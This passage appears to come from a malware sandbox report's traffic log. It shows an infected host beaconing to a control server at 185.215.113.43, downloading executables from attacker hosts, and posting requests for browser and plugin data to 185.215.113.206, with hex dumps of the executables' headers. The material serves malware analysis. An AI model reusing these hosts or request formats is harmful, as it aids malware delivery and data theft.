d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 15:49:49 GMTServer: Apache/2.4.58 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 2f 14 00 00 20 00 00 00 30 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 b9 02 00 00 60 14 00 00 ba 02 00 00 32 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 17 00 00 02 00 00 00 ec 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4f 14 00 00 00 00 00 48 00 00 00 02 00 05 00 68 7e 00 00 b8 44 00 00 01 00 00 00 55 00 00 06 20 c3 00 00 10 8c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 4e 02 28 1a 00 00 0a 02 28 1e 00 00 06 02 28 11 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 15:49:50 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 15:49:55 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 15:49:56 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
                      Source: global trafficHTTP traffic detected: GET /files/7427009775/dwVrTdy.exe HTTP/1.1Host: 31.41.244.11
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 34 33 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014430001&unit=246122658369
                      Source: global trafficHTTP traffic detected: GET /files/7427009775/AzVRM7c.exe HTTP/1.1Host: 31.41.244.11
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 34 33 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014431001&unit=246122658369
                      Source: global trafficHTTP traffic detected: GET /files/7427009775/t5abhIx.exe HTTP/1.1Host: 31.41.244.11
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 34 33 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014432001&unit=246122658369
                      Source: global trafficHTTP traffic detected: GET /files/8199790517/u1w30Wt.exe HTTP/1.1Host: 31.41.244.11
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 34 33 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014439001&unit=246122658369
                      Source: global trafficHTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 34 34 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014440001&unit=246122658369
                      Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 34 34 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014441001&unit=246122658369
                      Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 34 34 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014442001&unit=246122658369
                      Source: global trafficHTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGCHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 42 33 41 36 39 44 41 41 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 2d 2d 0d 0a Data Ascii: ------FCGIJDBAFCBAAKECGDGCContent-Disposition: form-data; name="hwid"2DB3A69DAA6E2371543510------FCGIJDBAFCBAAKECGDGCContent-Disposition: form-data; name="build"stok------FCGIJDBAFCBAAKECGDGC--
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAFBAEBKJKFIDHJJKJKHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 42 41 45 42 4b 4a 4b 46 49 44 48 4a 4a 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 63 64 61 66 31 34 30 64 35 36 61 62 39 34 34 63 36 38 31 36 64 61 36 62 64 33 37 66 33 38 36 64 30 62 39 62 38 32 66 37 36 31 36 30 34 34 64 39 36 63 61 31 35 33 36 35 34 30 36 65 34 63 36 35 31 61 61 33 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 42 41 45 42 4b 4a 4b 46 49 44 48 4a 4a 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 42 41 45 42 4b 4a 4b 46 49 44 48 4a 4a 4b 4a 4b 2d 2d 0d 0a Data Ascii: ------HDAFBAEBKJKFIDHJJKJKContent-Disposition: form-data; name="token"dcdaf140d56ab944c6816da6bd37f386d0b9b82f7616044d96ca15365406e4c651aa3d47------HDAFBAEBKJKFIDHJJKJKContent-Disposition: form-data; name="message"browsers------HDAFBAEBKJKFIDHJJKJK--
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJECFHCBKKEBAKFIJDHIHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 43 46 48 43 42 4b 4b 45 42 41 4b 46 49 4a 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 63 64 61 66 31 34 30 64 35 36 61 62 39 34 34 63 36 38 31 36 64 61 36 62 64 33 37 66 33 38 36 64 30 62 39 62 38 32 66 37 36 31 36 30 34 34 64 39 36 63 61 31 35 33 36 35 34 30 36 65 34 63 36 35 31 61 61 33 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 43 46 48 43 42 4b 4b 45 42 41 4b 46 49 4a 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 43 46 48 43 42 4b 4b 45 42 41 4b 46 49 4a 44 48 49 2d 2d 0d 0a Data Ascii: ------KJECFHCBKKEBAKFIJDHIContent-Disposition: form-data; name="token"dcdaf140d56ab944c6816da6bd37f386d0b9b82f7616044d96ca15365406e4c651aa3d47------KJECFHCBKKEBAKFIJDHIContent-Disposition: form-data; 